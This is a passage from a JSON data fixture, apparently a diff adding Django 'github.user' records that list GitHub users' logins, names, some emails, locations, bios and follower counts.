"Jesse Burns", + "login": "jburns131", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1120974?v=4", + "company": "jbWebWare.com", + "location": "MA, USA", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 20, + "public_gists_count": 12, + "public_repositories_count": 4, + "created_at": "2011-10-12T00:22:27Z", + "updated_at": "2022-01-10T06:51:28Z", + "node_id": "MDQ6VXNlcjExMjA5NzQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 863, + "fields": { + "nest_created_at": "2024-09-11T22:14:17.055Z", + "nest_updated_at": "2024-09-22T18:32:32.233Z", + "name": "AbiusX", + "login": "abiusx", + "email": "git@abiusx.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1401691?v=4", + "company": "Google / UVa / ZDResearch", + "location": "US", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 87, + "public_gists_count": 19, + "public_repositories_count": 31, + "created_at": "2012-02-02T13:00:57Z", + "updated_at": "2024-05-09T07:36:51Z", + "node_id": "MDQ6VXNlcjE0MDE2OTE=", + "bio": "Professional Hacker / Entrepreneur", + "is_hireable": true, + "twitter_username": "abiusx" + } +}, +{ + "model": "github.user", + "pk": 864, + "fields": { + "nest_created_at": "2024-09-11T22:14:18.313Z", + "nest_updated_at": "2024-09-11T22:14:20.426Z", + "name": "", + "login": "udf2457", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6958684?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2014-03-15T09:54:49Z", + "updated_at": "2024-09-05T18:35:02Z", + "node_id": "MDQ6VXNlcjY5NTg2ODQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 865, + "fields": { + "nest_created_at": "2024-09-11T22:14:22.091Z", + "nest_updated_at": "2024-09-11T22:14:22.091Z", + "name": "Gael Coat", + "login": "Gael42", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5319819?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2013-08-27T09:25:00Z", + "updated_at": "2024-07-01T13:54:00Z", + "node_id": "MDQ6VXNlcjUzMTk4MTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 866, + "fields": { + "nest_created_at": "2024-09-11T22:14:25.604Z", + "nest_updated_at": "2024-09-22T18:31:59.503Z", + "name": "Aleksander ", + "login": "bblue", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6132918?v=4", + "company": "", + "location": "Norway", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 13, + "created_at": "2013-12-08T01:18:36Z", + "updated_at": "2024-05-30T23:05:04Z", + "node_id": "MDQ6VXNlcjYxMzI5MTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 867, + "fields": { + "nest_created_at": "2024-09-11T22:14:26.485Z", + "nest_updated_at": "2024-09-11T22:14:26.485Z", + "name": "", + "login": "kroder", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6228443?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-12-20T06:34:01Z", + "updated_at": "2024-01-31T10:50:52Z", + "node_id": "MDQ6VXNlcjYyMjg0NDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 868, + "fields": { + "nest_created_at": "2024-09-11T22:14:28.617Z", + "nest_updated_at": "2024-09-11T22:14:28.617Z", + "name": "axiao", + "login": "joostshao", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3615951?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 387, + "followers_count": 39, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2013-02-17T06:49:27Z", + "updated_at": "2024-09-10T12:14:00Z", + "node_id": "MDQ6VXNlcjM2MTU5NTE=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 869, + "fields": { + "nest_created_at": "2024-09-11T22:14:29.444Z", + "nest_updated_at": "2024-09-11T22:14:29.444Z", + "name": "", + "login": "spinetrak", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5498066?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-09-19T23:28:41Z", + "updated_at": "2020-06-02T18:56:25Z", + "node_id": "MDQ6VXNlcjU0OTgwNjY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 870, + "fields": { + "nest_created_at": "2024-09-11T22:14:30.318Z", + "nest_updated_at": "2024-09-11T22:14:30.318Z", + "name": "Clayton Daley", + "login": "claytondaley", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1097439?v=4", + "company": "", + "location": "Chicago, IL", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 48, + "created_at": "2011-10-02T23:11:44Z", + "updated_at": "2024-04-22T14:29:26Z", + "node_id": "MDQ6VXNlcjEwOTc0Mzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 871, + "fields": { + "nest_created_at": "2024-09-11T22:14:32.864Z", + "nest_updated_at": "2024-09-11T22:14:32.864Z", + "name": "", + "login": "marpe", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1239842?v=4", + "company": "", + "location": "Sweden", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 8, + "public_gists_count": 5, + "public_repositories_count": 7, + "created_at": "2011-12-04T15:10:55Z", + "updated_at": "2024-09-02T17:24:06Z", + "node_id": "MDQ6VXNlcjEyMzk4NDI=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 872, + "fields": { + "nest_created_at": "2024-09-11T22:14:36.582Z", + "nest_updated_at": "2024-09-11T22:14:36.582Z", + "name": "", + "login": "aadewojo", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12172327?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2015-04-29T15:11:30Z", + "updated_at": "2022-03-15T15:19:07Z", + "node_id": "MDQ6VXNlcjEyMTcyMzI3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 873, + "fields": { + "nest_created_at": "2024-09-11T22:14:37.423Z", + "nest_updated_at": "2024-09-11T22:14:37.423Z", + "name": "", + "login": "gbyram", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2376145?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2012-09-19T06:26:13Z", + "updated_at": "2017-06-01T03:31:05Z", + "node_id": "MDQ6VXNlcjIzNzYxNDU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 874, + "fields": { + "nest_created_at": "2024-09-11T22:14:38.234Z", + "nest_updated_at": "2024-09-11T22:14:38.234Z", + "name": "ok_fish", + "login": "hepanming007", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4394665?v=4", + "company": "", + "location": "xiamen", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 26, + "created_at": "2013-05-10T08:23:33Z", + "updated_at": "2024-06-09T02:09:39Z", + "node_id": "MDQ6VXNlcjQzOTQ2NjU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 875, + "fields": { + "nest_created_at": "2024-09-11T22:14:39.115Z", + "nest_updated_at": "2024-09-11T22:14:39.115Z", + "name": "", + "login": "kamilmedia", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/10331099?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-12-28T15:03:41Z", + "updated_at": "2017-04-08T23:20:14Z", + "node_id": "MDQ6VXNlcjEwMzMxMDk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 876, + "fields": { + "nest_created_at": "2024-09-11T22:14:40.011Z", + "nest_updated_at": "2024-09-11T22:14:40.011Z", + "name": "Kunwar Khalid", + "login": "Kunwark", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13748763?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2015-08-11T13:09:59Z", + "updated_at": "2024-09-11T11:15:57Z", + "node_id": "MDQ6VXNlcjEzNzQ4NzYz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 877, + "fields": { + "nest_created_at": "2024-09-11T22:14:40.914Z", + "nest_updated_at": "2024-09-11T22:14:40.914Z", + "name": "nextglory", + "login": "nextglory", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5190756?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 32, + "created_at": "2013-08-08T14:43:19Z", + "updated_at": "2023-05-11T05:09:04Z", + "node_id": "MDQ6VXNlcjUxOTA3NTY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 878, + "fields": { + "nest_created_at": "2024-09-11T22:14:41.831Z", + "nest_updated_at": "2024-09-11T22:14:41.831Z", + "name": "David Ortega", + "login": "UrsaForce", + "email": "david.ortega.m@outlook.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8815984?v=4", + "company": "Clarika", + "location": "Guayaquil", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2014-09-18T04:47:52Z", + "updated_at": "2024-02-12T04:35:01Z", + "node_id": "MDQ6VXNlcjg4MTU5ODQ=", + "bio": "Full stack web developer always willing to learn new stuff and have fun coding.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 879, + "fields": { + "nest_created_at": "2024-09-11T22:14:42.689Z", + "nest_updated_at": "2024-09-11T22:14:42.689Z", + "name": "Stephen Flynn", + "login": "sf32738", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9754218?v=4", + "company": "", + "location": "Florida", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-11-14T21:41:36Z", + "updated_at": "2023-11-25T20:42:22Z", + "node_id": "MDQ6VXNlcjk3NTQyMTg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 880, + "fields": { + "nest_created_at": "2024-09-11T22:14:43.617Z", + "nest_updated_at": "2024-09-11T22:14:43.617Z", + "name": "", + "login": "goresci", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1907579?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2012-06-29T22:27:18Z", + "updated_at": "2021-06-02T13:49:25Z", + "node_id": "MDQ6VXNlcjE5MDc1Nzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 881, + "fields": { + "nest_created_at": "2024-09-11T22:14:44.462Z", + "nest_updated_at": "2024-09-11T22:14:44.462Z", + "name": "Michael Garvin", + "login": "dinobot71", + "email": "mike@prometheuspredicatedcoding.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18564924?v=4", + "company": "Prometheus Predicated Coding", + "location": "Ottawa, ON, Canada", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-04-20T02:16:56Z", + "updated_at": "2024-07-25T03:08:39Z", + "node_id": "MDQ6VXNlcjE4NTY0OTI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 882, + "fields": { + "nest_created_at": "2024-09-11T22:14:45.357Z", + "nest_updated_at": "2024-09-11T22:14:45.357Z", + "name": "G. Giani", + "login": "g-giani", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17945120?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-03-19T09:21:42Z", + "updated_at": "2024-07-22T14:55:13Z", + "node_id": "MDQ6VXNlcjE3OTQ1MTIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 883, + "fields": { + "nest_created_at": "2024-09-11T22:14:46.210Z", + "nest_updated_at": "2024-09-11T22:14:46.210Z", + "name": "", + "login": "adamjeff", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8728740?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-09-10T21:23:47Z", + "updated_at": "2016-09-08T10:37:18Z", + "node_id": "MDQ6VXNlcjg3Mjg3NDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 884, + "fields": { + "nest_created_at": "2024-09-11T22:14:47.071Z", + "nest_updated_at": "2024-09-11T22:14:47.071Z", + "name": "Mohamed Akef", + "login": "mohamed-akef", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1524321?v=4", + "company": "@Sharwa", + "location": "Egypt", + "collaborators_count": 0, + "following_count": 36, + "followers_count": 25, + "public_gists_count": 4, + "public_repositories_count": 20, + "created_at": "2012-03-10T22:38:37Z", + "updated_at": "2024-07-04T09:31:48Z", + "node_id": "MDQ6VXNlcjE1MjQzMjE=", + "bio": "Software engineer, Gamer & Cars lover", + "is_hireable": false, + "twitter_username": "Mohamed3kef" + } +}, +{ + "model": "github.user", + "pk": 885, + "fields": { + "nest_created_at": "2024-09-11T22:14:47.875Z", + "nest_updated_at": "2024-09-11T22:14:47.875Z", + "name": "Julian Wood", + "login": "orinoco", + "email": "jwoodchip@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3967161?v=4", + "company": "", + "location": "Calgary, Alberta", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 4, + "public_repositories_count": 13, + "created_at": "2013-03-25T18:01:35Z", + "updated_at": "2024-08-20T19:09:28Z", + "node_id": "MDQ6VXNlcjM5NjcxNjE=", + "bio": "Full stack developer", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 886, + "fields": { + "nest_created_at": "2024-09-11T22:14:48.717Z", + "nest_updated_at": "2024-09-11T22:14:48.717Z", + "name": "Starbeamrainbowlabs", + "login": "sbrl", + "email": "sbrl@starbeamrainbowlabs.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9929737?v=4", + "company": "", + "location": "Nowhere, everywhere and anywhere in between", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 141, + "public_gists_count": 70, + "public_repositories_count": 83, + "created_at": "2014-11-24T11:31:26Z", + "updated_at": "2024-09-09T08:25:43Z", + "node_id": "MDQ6VXNlcjk5Mjk3Mzc=", + "bio": "A PhD computer science researcher who loves to explore and learn new things.", + "is_hireable": false, + "twitter_username": "SBRLabs" + } +}, +{ + "model": "github.user", + "pk": 887, + "fields": { + "nest_created_at": "2024-09-11T22:14:49.556Z", + "nest_updated_at": "2024-09-11T22:14:50.442Z", + "name": "", + "login": "seekyong", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11072899?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2015-02-19T10:20:17Z", + "updated_at": "2023-12-30T01:57:18Z", + "node_id": "MDQ6VXNlcjExMDcyODk5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 888, + "fields": { + "nest_created_at": "2024-09-11T22:14:51.323Z", + "nest_updated_at": "2024-09-11T22:14:51.323Z", + "name": "", + "login": "aynaz96", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/27864779?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2017-04-21T17:22:19Z", + "updated_at": "2021-08-01T13:08:09Z", + "node_id": "MDQ6VXNlcjI3ODY0Nzc5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 889, + "fields": { + "nest_created_at": "2024-09-11T22:14:52.232Z", + "nest_updated_at": "2024-09-11T22:14:52.232Z", + "name": "Mr. Zhang,", + "login": "CrazyCodes", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/9151227?v=4", + "company": "Beijing municipal", + "location": "", + "collaborators_count": 0, + "following_count": 44, + "followers_count": 134, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2014-10-11T11:48:51Z", + "updated_at": "2024-09-04T06:42:37Z", + "node_id": "MDQ6VXNlcjkxNTEyMjc=", + "bio": "Every line of code is art", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 890, + "fields": { + "nest_created_at": "2024-09-11T22:14:53.334Z", + "nest_updated_at": "2024-09-11T22:14:54.141Z", + "name": "", + "login": "anonymuos1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5244508?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-08-16T12:20:47Z", + "updated_at": "2021-04-21T16:20:56Z", + "node_id": "MDQ6VXNlcjUyNDQ1MDg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 891, + "fields": { + "nest_created_at": "2024-09-11T22:14:55.003Z", + "nest_updated_at": "2024-09-11T22:14:55.003Z", + "name": "Irshad Ansari", + "login": "irshadalif", + "email": "irshadahmed.ansari@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/19163108?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-05-03T06:18:45Z", + "updated_at": "2021-10-21T17:19:30Z", + "node_id": "MDQ6VXNlcjE5MTYzMTA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 892, + "fields": { + "nest_created_at": "2024-09-11T22:14:55.817Z", + "nest_updated_at": "2024-09-11T22:14:55.817Z", + "name": "Luca", + "login": "lsantaniello", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1018939?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 20, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2011-09-01T08:43:47Z", + "updated_at": "2024-07-12T18:05:30Z", + "node_id": "MDQ6VXNlcjEwMTg5Mzk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 893, + "fields": { + "nest_created_at": "2024-09-11T22:14:56.689Z", + "nest_updated_at": "2024-09-11T22:14:57.540Z", + "name": "NamNguyen", + "login": "thanhnambkhn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4994500?v=4", + "company": "", + "location": "Hanoi, Vietnam", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 7, + "created_at": "2013-07-12T04:20:58Z", + "updated_at": "2024-09-11T08:26:46Z", + "node_id": "MDQ6VXNlcjQ5OTQ1MDA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 894, + "fields": { + "nest_created_at": "2024-09-11T22:14:58.371Z", + "nest_updated_at": "2024-09-11T22:15:00.128Z", + "name": "P-A", + "login": "P-A-C", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/23724240?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-11-24T15:17:51Z", + "updated_at": "2019-12-13T22:47:46Z", + "node_id": "MDQ6VXNlcjIzNzI0MjQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 895, + "fields": { + "nest_created_at": "2024-09-11T22:15:01.007Z", + "nest_updated_at": "2024-09-11T22:15:01.007Z", + "name": "Emmanuel Jonah", + "login": "tejkweku", + "email": "jonah.emma.kweku@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/7029109?v=4", + "company": "", + "location": "Kumasi, Ghana", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2014-03-22T06:12:47Z", + "updated_at": "2023-07-18T12:42:45Z", + "node_id": "MDQ6VXNlcjcwMjkxMDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 896, + "fields": { + "nest_created_at": "2024-09-11T22:15:01.958Z", + "nest_updated_at": "2024-09-11T22:15:01.958Z", + "name": "Dave Smith", + "login": "veotax", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14900285?v=4", + "company": "Amalga", + "location": "Toronto, Canada", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2015-09-30T03:06:42Z", + "updated_at": "2023-05-28T10:14:29Z", + "node_id": "MDQ6VXNlcjE0OTAwMjg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 897, + "fields": { + "nest_created_at": "2024-09-11T22:15:02.838Z", + "nest_updated_at": "2024-09-11T22:15:02.838Z", + "name": "", + "login": "randamezrag", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51890638?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-06-16T21:05:01Z", + "updated_at": "2024-05-16T14:26:50Z", + "node_id": "MDQ6VXNlcjUxODkwNjM4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 898, + "fields": { + "nest_created_at": "2024-09-11T22:15:03.812Z", + "nest_updated_at": "2024-09-11T22:15:03.812Z", + "name": "", + "login": "vgavrilovikj", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/29601489?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2017-06-21T12:08:58Z", + "updated_at": "2024-08-17T11:38:27Z", + "node_id": "MDQ6VXNlcjI5NjAxNDg5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 899, + "fields": { + "nest_created_at": "2024-09-11T22:15:04.701Z", + "nest_updated_at": "2024-09-11T22:15:04.701Z", + "name": "", + "login": "CabrioCar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/62959147?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-03-31T18:19:18Z", + "updated_at": "2020-03-31T18:19:18Z", + "node_id": "MDQ6VXNlcjYyOTU5MTQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 900, + "fields": { + "nest_created_at": "2024-09-11T22:15:05.566Z", + "nest_updated_at": "2024-09-11T22:15:05.566Z", + "name": "", + "login": "NeorsdEmployee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/76214023?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-12-18T13:30:28Z", + "updated_at": "2024-08-30T19:39:09Z", + "node_id": "MDQ6VXNlcjc2MjE0MDIz", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 901, + "fields": { + "nest_created_at": "2024-09-11T22:15:06.407Z", + "nest_updated_at": "2024-09-13T04:55:54.807Z", + "name": "L", + "login": "landau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/911603?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 19, + "public_repositories_count": 60, + "created_at": "2011-07-13T01:10:44Z", + "updated_at": "2024-09-11T17:57:52Z", + "node_id": "MDQ6VXNlcjkxMTYwMw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 902, + "fields": { + "nest_created_at": "2024-09-11T22:15:27.090Z", + "nest_updated_at": "2024-09-22T20:25:30.769Z", + "name": "Erlend Oftedal", + "login": "eoftedal", + "email": "erlend@oftedal.no", + "avatar_url": "https://avatars.githubusercontent.com/u/238804?v=4", + "company": "", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 68, + "followers_count": 174, + "public_gists_count": 22, + "public_repositories_count": 92, + "created_at": "2010-04-07T14:34:44Z", + "updated_at": "2024-08-26T13:04:26Z", + "node_id": "MDQ6VXNlcjIzODgwNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "webtonull" + } +}, +{ + "model": "github.user", + "pk": 903, + "fields": { + "nest_created_at": "2024-09-11T22:15:32.428Z", + "nest_updated_at": "2024-09-11T22:15:32.428Z", + "name": "Stevo", + "login": "ppsel03", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4769609?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-06-22T04:46:49Z", + "updated_at": "2019-10-26T15:57:40Z", + "node_id": "MDQ6VXNlcjQ3Njk2MDk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 904, + "fields": { + "nest_created_at": "2024-09-11T22:15:33.757Z", + "nest_updated_at": "2024-09-11T22:15:33.757Z", + "name": "", + "login": "jkariotisAtNexIt", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/7716193?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2014-05-27T17:38:00Z", + "updated_at": "2016-02-27T16:36:48Z", + "node_id": "MDQ6VXNlcjc3MTYxOTM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 905, + "fields": { + "nest_created_at": "2024-09-11T22:15:34.602Z", + "nest_updated_at": "2024-09-11T22:15:34.602Z", + "name": "", + "login": "EliezerBee", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/5578694?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2013-09-30T17:53:24Z", + "updated_at": "2020-12-03T17:25:04Z", + "node_id": "MDQ6VXNlcjU1Nzg2OTQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 906, + "fields": { + "nest_created_at": "2024-09-11T22:15:35.922Z", + "nest_updated_at": "2024-09-22T18:32:20.123Z", + "name": "Kevin Kuszyk", + "login": "kevinkuszyk", + "email": "kevin.kuszyk@burendo.com", + "avatar_url": "https://avatars.githubusercontent.com/u/2734580?v=4", + "company": "@BurendoUK ", + "location": "Leeds, UK", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 34, + "public_gists_count": 4, + "public_repositories_count": 52, + "created_at": "2012-11-06T11:40:17Z", + "updated_at": "2024-08-14T14:27:45Z", + "node_id": "MDQ6VXNlcjI3MzQ1ODA=", + "bio": "Cloud Architect at Burendo", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 907, + "fields": { + "nest_created_at": "2024-09-11T22:15:36.758Z", + "nest_updated_at": "2024-09-11T22:15:36.758Z", + "name": "Curtis Carter", + "login": "digitalcoyote", + "email": "coyote@duck.com", + "avatar_url": "https://avatars.githubusercontent.com/u/16868093?v=4", + "company": "", + "location": "NorthEast Arkansas", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 22, + "public_gists_count": 4, + "public_repositories_count": 32, + "created_at": "2016-01-24T19:44:07Z", + "updated_at": "2024-09-06T11:09:40Z", + "node_id": "MDQ6VXNlcjE2ODY4MDkz", + "bio": "Cross-Platform .Net Developer", + "is_hireable": false, + "twitter_username": "codingcoyote" + } +}, +{ + "model": "github.user", + "pk": 908, + "fields": { + "nest_created_at": "2024-09-11T22:15:47.838Z", + "nest_updated_at": 